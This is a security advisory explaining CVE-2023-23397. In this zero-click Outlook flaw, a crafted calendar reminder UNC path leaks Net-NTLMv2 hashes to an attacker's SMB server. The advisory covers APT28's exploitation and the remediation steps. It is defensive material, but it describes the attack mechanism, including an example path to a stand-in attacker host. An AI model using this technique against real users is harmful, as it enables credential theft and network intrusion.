CVE-2023-23397

What is Microsoft Outlook?

Microsoft Outlook is the world's most widely deployed enterprise email and calendar client, used by hundreds of millions of users across government, defense, financial, critical infrastructure, and commercial sectors. Outlook integrates deeply with Windows Active Directory and NTLM authentication, automatically processing calendar invitations, meeting reminders, and email attachments sent by other users. When Outlook processes these items — including at receipt/sync time, before the user opens anything — it can be triggered to make network connections. Any vulnerability that causes Outlook to send authenticated credentials to an attacker-controlled server on receipt of a crafted email or calendar item represents a zero-click credential theft capability of the highest severity.

Overview

CVE-2023-23397 is a critical zero-day privilege escalation vulnerability in Microsoft Outlook that enables an unauthenticated attacker to steal a victim's Net-NTLMv2 hash simply by sending a specially crafted email or calendar invitation containing a UNC path to an attacker-controlled server. When Outlook processes the item — which happens automatically in the background when email arrives, not requiring the user to open or preview the message — Outlook attempts to connect to the UNC path to retrieve the reminder sound, automatically sending the Windows Net-NTLMv2 credential hash for the victim's account. APT28 (Russian GRU) exploited this vulnerability as a zero-day from approximately April 2022 through the March 2023 patch — 11 months of undetected zero-day exploitation against European government, military, energy, and transportation targets.

Affected Versions

Microsoft Outlook for Mac, iOS, and Android are not affected. Exchange Online / Microsoft 365 web clients are not affected. Only Windows Outlook clients process the malicious UNC path rendering.

Technical Details

CWE-20 (Improper Input Validation). Outlook supports custom reminder sounds for calendar items — a feature that allows calendar invitations to specify a UNC path (e.g., \\attacker.com\share\sound.wav) as the reminder sound file. When Outlook processes a calendar invitation containing a PidLidReminderFileParameter property with a UNC path, Outlook automatically initiates a Windows SMB connection to that path to retrieve the sound file.

Windows NTLM authentication is performed automatically for SMB connections — the Windows system sends a Net-NTLMv2 authentication hash to the server at the target UNC path. An attacker operating an SMB server at the specified address receives this hash, which can then be:

1. Cracked offline: Net-NTLMv2 hashes are crackable via dictionary or brute-force attacks, potentially revealing the plaintext Windows password.
2. Used in NTLM relay attacks: The hash can be relayed immediately to authenticate to other services on the corporate network that accept NTLM authentication — enabling lateral movement without needing to crack the password.

The critical characteristic is the UI:N (No User Interaction) requirement: Outlook processes the calendar item automatically when email is delivered to the inbox, even if the user never opens the message. This makes CVE-2023-23397 a zero-click credential theft that works against any reachable Windows Outlook user.

Discovery

The Ukraine CERT (CERT-UA) identified APT28 exploitation of this vulnerability in early 2023 while investigating Russian cyberattacks against Ukrainian defense and government targets, and reported it to Microsoft. Microsoft's investigation revealed the zero-day had been exploited since approximately April 2022 — 11 months before the patch — in campaigns targeting organizations across Europe.

Exploitation Context

APT28 (Fancy Bear, STRONTIUM, Forest Blizzard) — the cyber arm of Russia's GRU military intelligence — used CVE-2023-23397 in a sustained campaign targeting:

• European government ministries and defense departments
• Military and defense-industrial organizations
• Energy and critical infrastructure companies
• Transportation sector entities

The attack methodology was simple and reliable: send a crafted calendar invitation to a target's email, then relay or crack the received Net-NTLMv2 hash for initial access. APT28's 11-month operational use before detection reflects both the stealth of the technique (no user interaction, no malicious attachment to detect) and the effectiveness of credential relay for lateral movement in Active Directory environments.

The same-day CISA KEV addition (March 14, 2023) reflects the extreme severity — zero-click credential theft from a ubiquitous email client with confirmed nation-state exploitation and an 11-month undetected zero-day window.

Remediation

1. Apply the March 2023 Patch Tuesday updates for all versions of Microsoft Outlook on Windows immediately.
2. As a temporary workaround if patching cannot be done immediately: add users to the Protected Users security group in Active Directory (prevents NTLM use for authentication) and block outbound SMB (port 445) at the network perimeter firewall.
3. Run Microsoft's provided PowerShell script to identify and remove malicious PidLidReminderFileParameter properties from existing calendar items in Exchange mailboxes — the advisory includes the script.
4. Review Exchange and email gateway logs for calendar items with UNC paths in reminder fields — particularly items sent from external senders between April 2022 and March 2023.
5. Check for NTLM relay attack indicators in Active Directory logs: unexpected Kerberos or NTLM authentication events, particularly authentications from unusual source IPs or at unusual times.
6. Consider disabling NTLM authentication entirely in favor of Kerberos for internal services — Net-NTLMv2 relay is a foundational technique in Active Directory lateral movement that extends beyond CVE-2023-23397.